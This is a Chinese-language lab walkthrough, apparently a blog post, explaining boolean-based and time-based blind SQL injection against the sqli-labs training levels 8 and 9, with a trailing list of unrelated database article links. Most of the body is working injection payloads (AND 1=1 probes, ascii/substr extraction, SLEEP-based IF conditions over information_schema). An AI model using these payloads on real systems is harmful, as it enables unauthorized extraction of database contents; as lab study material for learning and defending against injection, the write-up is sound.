boolen盲注与时间盲注,sqli-labs第八关与第九关

一:boolen盲注

1.确认注入的类型

?id=1'

?id=1" ?id=1

只有在单引号时无显。

?id=1' AND 1=1 --+

由于 1=1 条件恒为真,若页面显示 You are in...........,说明构造的条件使 SQL 查询能匹配到结果。

?id=1' AND 1=2 --+

由于 1=2 条件恒为假,若页面不显示 You are in...........,说明构造的条件使 SQL 查询无匹配结果。

2.数据库名长度

?id=1'and length((select database()))=7--+

?id=1'and length((select database()))=8--+

3.获取数据库名

?id=1' and ascii(substr((database()),1,1)) =115 --+

4.获取表名

?id=1' and (ascii(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101--+

5.获取具体数据

?id=1%27%20and%20%20(select%20count(*)%20from%20users)=13%20--+

二:时间盲注

1.判断注入类型

?id=1%27%20AND%20SLEEP(5)--+

首先,我们需要确认注入点是否存在。可以尝试在 id 参数后面添加单引号,观察页面响应时间是否有变化。如果页面响应时间明显增加了 5 秒,说明注入点存在。

2,获取数据库名长度

?id=1%27%20AND%20IF(LENGTH(DATABASE())=N,%20SLEEP(5),%201)--+

N 从 1 开始逐步递增,直到页面响应时间增加了 5 秒,此时的 N 就是数据库名的长度。

3.获取数据库名id=1%27%20AND%20IF(SUBSTR(DATABASE(),%20N,%201)=%27CHAR%27,%20SLEEP(5),%201)--+

将 N 从 1 开始逐步递增,CHAR 从 a 到 z、A 到 Z、0 到 9 以及其他可能的字符进行尝试,直到页面响应时间增加了 5 秒,此时的 CHAR 就是数据库名的第 N 位字符。

4.获取表名

?id=1' AND IF(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASE_NAME' LIMIT N, 1), 1, 1)='CHAR', SLEEP(5), 1)--+

直到页面响应时间增加了 5 秒,此时的 CHAR 就是第 N 个表名的第 1 位字符。然后逐步递增 N 和字符位置,直到获取到所有表名。

5.获取列名

?id=1' AND IF(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema='DATABASE_NAME' AND table_name='TABLE_NAME' LIMIT N, 1), 1, 1)='CHAR', SLEEP(5), 1)--+

直到页面响应时间增加了 5 秒,此时的 CHAR 就是第 N 个列名的第 1 位字符。然后逐步递增 N 和字符位置,直到获取到所有列名。

6.获取数据

id=1' AND IF(SUBSTR((SELECT COLUMN_NAME FROM TABLE_NAME LIMIT N, 1), 1, 1)='CHAR', SLEEP(5), 1)--+

直到页面响应时间增加了 5 秒,此时的 CHAR 就是第 N 条记录的 COLUMN_NAME 列的第 1 位字符。然后逐步递增 N 和字符位置,直到获取到所有数据。

相关推荐
DarkAthena35 分钟前
【ORACLE】记录一些ORACLE的merge into语句的BUG
数据库·oracle·bug
江沉晚呤时1 小时前
深入了解C# List集合及两种常见排序算法:插入排序与堆排序
windows·sql·算法·oracle·c#·排序算法·mybatis
大新新大浩浩1 小时前
arm64适配系列文章-第三章-arm64环境上mariadb的部署
数据库·arm·mariadb
聪明的墨菲特i1 小时前
SQL进阶知识:九、高级数据类型
xml·数据库·sql·mysql·json·空间数据类型
oioihoii1 小时前
金仓数据库 KingbaseES 产品深度优化提案:迈向卓越的全面升级
数据库·性能优化·金融·金仓数据库 2025 征文·数据库平替用金仓
艺杯羹1 小时前
JDBC 批处理与事务处理:提升数据操作效率与一致性的密钥
数据库·mysql·jdbc·事务处理·批处理数据
猫咪-95272 小时前
【金仓数据库征文】——选择金仓,选择胜利
数据库·金仓数据库 2025 征文·数据库平替用金仓
努力进修3 小时前
【金仓数据库征文】-金仓数据库性能调优 “快准稳” 攻略:实战优化,让数据处理飞起来
数据库·人工智能·金仓数据库 2025 征文·数据库平替用金仓
User_芊芊君子4 小时前
【金仓数据库征文】金仓数据库KingbaseES:千行百业国产化征程中的璀璨之星
数据库·数据库平替用金仓·金仓数据库2025征文
_extraordinary_5 小时前
MySQL 库的操作 -- 增删改查,备份和恢复,系统编码
android·mysql·oracle